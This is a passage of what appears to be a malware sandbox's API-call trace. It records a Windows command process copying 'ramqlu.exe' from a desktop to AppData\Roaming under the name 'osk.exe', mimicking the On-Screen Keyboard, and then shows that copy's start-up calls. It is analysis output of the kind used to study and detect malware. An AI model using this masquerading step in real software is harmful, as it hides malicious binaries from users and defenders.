_MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.257] GetProcessHeap () returned 0x4a0000 [0058.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a1298 | out: hHeap=0x4a0000) returned 1 [0058.257] GetProcessHeap () returned 0x4a0000 [0058.257] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4a1298 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.259] GetProcessHeap () returned 0x4a0000 [0058.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a1298 | out: hHeap=0x4a0000) returned 1 [0058.259] GetProcessHeap () returned 0x4a0000 [0058.259] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c4) returned 0x4b32d8 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b32d8, Size=0xe8) returned 0x4b32d8 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b32d8) returned 0xe8 [0058.260] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4b33c8 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x258) returned 0x4b3400 [0058.260] _wcsicmp (_String1="ramqlu.exe", _String2=".") returned 68 [0058.260] _wcsicmp (_String1="ramqlu.exe", _String2="..") returned 68 [0058.260] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x20 [0058.261] GetProcessHeap () returned 0x4a0000 [0058.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4b3660 [0058.261] GetProcessHeap () returned 0x4a0000 [0058.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x258) returned 0x4b41f0 [0058.261] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0058.261] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0058.261] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x3ff870, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x3ff870, ReturnLength=0x0) returned 0x0 [0058.261] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x3ff878, ProcessInformationLength=0x4) returned 0x0 [0058.261] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0058.261] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", fInfoLevelId=0x1, lpFindFileData=0x4b3408, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b3408) returned 0x4b3698 [0058.262] GetProcessHeap () returned 0x4a0000 [0058.262] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4a1298 [0058.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x3feb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0058.262] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="con") returned -53 [0058.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3fed7c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x78 [0058.262] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0058.262] _get_osfhandle (_FileHandle=3) returned 0x78 [0058.262] GetFileType (hFile=0x78) returned 0x1 [0058.262] SetErrorMode (uMode=0x0) returned 0x0 [0058.262] SetErrorMode (uMode=0x1) returned 0x0 [0058.263] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", nBufferLength=0x208, lpBuffer=0x3ff030, lpFilePart=0x3fedb4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", lpFilePart=0x3fedb4*="ramqlu.exe") returned 0x30 [0058.263] SetErrorMode (uMode=0x0) returned 0x1 [0058.263] _get_osfhandle (_FileHandle=3) returned 0x78 [0058.263] ReadFile (in: hFile=0x78, lpBuffer=0x110000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x3fee20, lpOverlapped=0x0 | out: lpBuffer=0x110000*, lpNumberOfBytesRead=0x3fee20*=0x200, lpOverlapped=0x0) returned 1 [0058.264] SetErrorMode (uMode=0x0) returned 0x0 [0058.264] SetErrorMode (uMode=0x1) returned 0x0 [0058.264] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x3fe990, lpFilePart=0x3fe988 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x3fe988*="osk.exe") returned 0x35 [0058.264] SetErrorMode (uMode=0x0) returned 0x1 [0058.264] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0058.264] GetProcessHeap () returned 0x4a0000 [0058.264] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x258) returned 0x4b4450 [0058.264] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0058.264] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0058.264] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0058.265] GetLastError () returned 0x2 [0058.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x3feb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0058.265] SetErrorMode (uMode=0x0) returned 0x0 [0058.265] SetErrorMode (uMode=0x1) returned 0x0 [0058.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x3fe990, lpFilePart=0x3fe988 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x3fe988*="osk.exe") returned 0x35 [0058.265] SetErrorMode (uMode=0x0) returned 0x1 [0058.265] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0058.265] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0058.265] CopyFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4a7541b4, dwCopyFlags=0x0) returned 1 [0058.289] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x2020 [0058.289] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", dwFileAttributes=0x2020) returned 1 [0058.290] _close (_FileHandle=3) returned 0 [0058.290] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0058.290] GetFileType (hFile=0xffffffff) returned 0x0 [0058.290] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0058.290] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x3fedc4) returned 0 [0058.290] FindNextFileW (in: hFindFile=0x4b3698, lpFindFileData=0x4b3408 | out: lpFindFileData=0x4b3408*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10f3e80, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xd10f3e80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ramqlu.exe", cAlternateFileName="")) returned 0 [0058.290] GetLastError () returned 0x12 [0058.290] FindClose (in: hFindFile=0x4b3698 | out: hFindFile=0x4b3698) returned 1 [0058.290] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x3ff870, ProcessInformationLength=0x4) returned 0x0 [0058.290] _vsnwprintf (in: _Buffer=0x4a755040, _BufferCount=0x103, _Format="%9d", _ArgList=0x3ff84c | out: _Buffer=" 1") returned 9 [0058.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.290] GetFileType (hFile=0x7) returned 0x2 [0058.291] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0058.291] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff7d8 | out: lpMode=0x3ff7d8) returned 1 [0058.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.291] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ff80c | out: lpConsoleScreenBufferInfo=0x3ff80c) returned 1 [0058.291] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a764640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0058.292] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a764640, nSize=0x2000, Arguments=0x3ff84c | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0058.292] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a764640*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x3ff830, lpReserved=0x0 | out: lpBuffer=0x4a764640*, lpNumberOfCharsWritten=0x3ff830*=0x1b) returned 1 [0058.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.293] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.293] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7541ac | out: lpMode=0x4a7541ac) returned 1 [0058.293] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.293] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7541b0 | out: lpMode=0x4a7541b0) returned 1 [0058.294] SetConsoleInputExeNameW () returned 0x1 [0058.294] GetConsoleOutputCP () returned 0x1b5 [0058.294] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a754260 | out: lpCPInfo=0x4a754260) returned 1 [0058.294] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.294] exit (_Code=0) Process: id = "5" image_name = "osk.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe" page_root = "0x47ed8000" os_pid = "0x620" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7c4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x5c4 [0060.135] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0060.136] GetKeyboardType (nTypeFlag=0) returned 4 [0060.136] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " [0060.136] GetStartupInfoA (in: lpStartupInfo=0x18fef8 | out: lpStartupInfo=0x18fef8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.136] GetACP () returned 0x4e4 [0060.136] GetCurrentThreadId () returned 0x5c4 [0060.137] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ede8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x35 [0060.186] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ecc3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x35 [0060.186] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0060.186] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0060.186] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0060.187] lstrcpynA (in: lpString1=0x18ecc3, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" [0060.187] GetThreadLocale () returned 0x409 [0060.187] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18edd3, cchData=5 | out: lpLCData="ENU") returned 4 [0060.188] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0060.189] lstrcpynA (in: lpString1=0x18ecf5, lpString2="ENU", iMaxLength=211 | out: lpString1="ENU") returned="ENU" [0060.189] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0060.189] lstrcpynA (in: lpString1=0x18ecf5, lpString2="EN", iMaxLength=211 | out: lpString1="EN") returned="EN" [0060.189] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.191] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d70000 [0060.191] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.191] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.192] GetVersionExA (in: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4, dwMinorVersion=0x140000, dwBuildNumber=0x18fec4, dwPlatformId=0x76c1e37d, szCSDVersion="ÿÿÿÿ") | out: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.192] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0060.192] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0060.192] GetThreadLocale () returned 0x409 [0060.192] GetSystemMetrics (nIndex=42) returned 0 [0060.201] GetThreadLocale () returned 0x409 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jan") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd74, cchData=256 | out: lpLCData="January") returned 8 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Feb") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd74, cchData=256 | out: lpLCData="February") returned 9 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd74, 